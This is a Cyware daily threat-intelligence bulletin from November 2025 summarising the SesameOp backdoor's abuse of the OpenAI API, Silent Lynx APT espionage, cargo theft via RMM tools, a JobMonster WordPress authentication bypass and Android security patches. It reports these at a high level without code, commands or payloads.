Cyware Daily Threat Intelligence, November 04, 2025

Attackers are now hiding their malicious traffic in plain sight by using popular AI services. A sophisticated backdoor named SesameOp cleverly exploits OpenAI's API. This novel technique allows the malware to receive encrypted commands for espionage, all while disguised as legitimate web traffic.

As diplomatic summits convene, a cyber-espionage campaign is working in the shadows. The Silent Lynx APT group is actively targeting Central Asian nations, Russia, and China with spear-phishing attacks.

The most dangerous vulnerabilities are those that require no action from the user. Google's November Android security update patches two such critical flaws, including one that could allow for remote code execution. This update also marks Google's shift to a simpler, single patch level system for its partners.

Top Malware Reported in the Last 24 Hours

Attackers target trucking firms with RMM tools

Cybercriminals are increasingly targeting trucking and logistics companies to steal cargo through sophisticated attack chains. By exploiting vulnerabilities in the digital transformation of the supply chain, these attackers use RMM tools to gain unauthorized access. They compromise load board accounts to post fake shipments, allowing them to bid on real loads and ultimately hijack valuable cargo. This trend has led to significant financial losses, with cargo theft costing the industry approximately $34 billion annually. 

New SesameOp backdoor discovered

Microsoft has revealed a sophisticated backdoor named SesameOp, which exploits OpenAI's API for stealthy C2 communications. This malware is designed to maintain persistence and covertly manage compromised devices, facilitating long-term espionage efforts. The infection chain includes a loader component and a .NET-based backdoor that uses the OpenAI API to fetch and execute encrypted commands. The DLL is heavily obfuscated to evade detection, and it communicates results back to the attackers.

Silent Lynx APT targets Central Asia

The Silent Lynx APT group has been actively targeting Central Asian nations, Russia, and China for espionage. This group employs spear-phishing campaigns and malicious implants to infiltrate governmental and critical infrastructure sectors. Two significant campaigns are analyzed: one focused on Russia-Azerbaijan relations during a summit in Dushanbe and the other on China-Central Asia relations during a summit in Astana. The research reveals the use of malicious RAR archives containing LNK files that execute PowerShell scripts from GitHub. Silent Lynx uses tools like Silent Loader, LAPLAS implant (TCP & TLS), and SilentSweeper (.NET-based implant) for deploying reverse shells and maintaining persistence. 

Top Vulnerabilities Reported in the Last 24 Hours

Actively exploited bug in JobMonster WP theme

Hackers are exploiting a critical authentication bypass vulnerability (CVE-2025-5397) in the JobMonster WordPress theme, which allows unauthorized access to administrator accounts when social login is enabled. This flaw arises from the check_login() function's inability to properly verify a user's identity, enabling unauthenticated attackers to bypass standard authentication protocols. To successfully exploit this vulnerability, attackers typically need to know the target administrator’s username or email. The vulnerability affects all versions of the theme up to 4.8.1 and has been assigned a critical severity score of 9.8. The malicious activity was identified by Wordfence, which has blocked multiple exploit attempts against its clients in recent days, underscoring the ongoing security risks associated with WordPress themes.

Android patches critical RCE flaw

Google's November 2025 Android security updates address two critical vulnerabilities in the System component, including a significant flaw (CVE-2025-48593) that could enable remote code execution without user interaction, affecting Android versions 13 to 16. This update marks a shift from the traditional two-security patch level system to a single patch level approach, simplifying the process for vendors. The second vulnerability, tracked as CVE-2025-48581, also affects Android 16 and could lead to local privilege escalation. Notably, no active exploitation of these vulnerabilities has been reported. The update does not include any patches for Google Play system updates, Automotive OS, or Wear OS.